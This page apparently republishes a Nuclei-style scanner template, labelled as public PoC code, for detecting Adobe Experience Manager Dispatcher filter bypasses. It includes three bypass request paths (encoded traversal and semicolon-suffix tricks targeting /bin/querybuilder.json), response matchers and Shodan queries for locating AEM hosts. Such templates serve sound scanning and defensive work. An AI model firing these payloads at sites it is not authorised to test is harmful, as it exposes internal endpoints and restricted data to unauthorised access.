漏洞描述
Detected potential Adobe Experience Manager (AEM) Dispatcher misconfigurations that could have allowed bypassing request filtering, exposing internal endpoints, or permitting unauthorised access to restricted resources.
aem-dispatcher-bypass: Adobe Experience Manager - Dispatcher Bypass
PoC代码[已公开]
id: aem-dispatcher-bypass
info:
name: Adobe Experience Manager - Dispatcher Bypass
author: DhiyaneshDK,assetnote
severity: medium
description: |
Detected potential Adobe Experience Manager (AEM) Dispatcher misconfigurations that could have allowed bypassing request filtering, exposing internal endpoints, or permitting unauthorised access to restricted resources.
reference:
- https://docs.google.com/presentation/d/1PypHgd0r3ZVII7e5fLX5JjZIJQfAsMEydLnug0yFb9k/edit?usp=sharing (Slide 18,22,24)
metadata:
verified: true
max-request: 1
vendor: adobe
product: experience_manager
shodan-query:
- http.title:"aem sign in"
- http.component:"adobe experience manager"
- cpe:"cpe:2.3:a:adobe:experience_manager"
tags: adobe,aem,dispatcher
http:
- raw:
- |
GET {{paths}} HTTP/1.1
Host: {{Hostname}}
payloads:
paths:
- "/graphql/execute.json/..%2f../bin/querybuilder.json"
- "/bin/querybuilder.json;x='x/.ico/y'"
- "/bin/querybuilder.json;x='x/graphql/execute/json/y'"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- '"results":'
- '"hits":'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100da86498b595a02839334744f5212bd29f0ec61431ba75b629567ec5f31b01da2022100c4da75bfb6ebc7569769c8cf9c9b75d1195b934b6761fbf539bd4ba8f11336b3:922c64590222798bb761d5b6d8e72950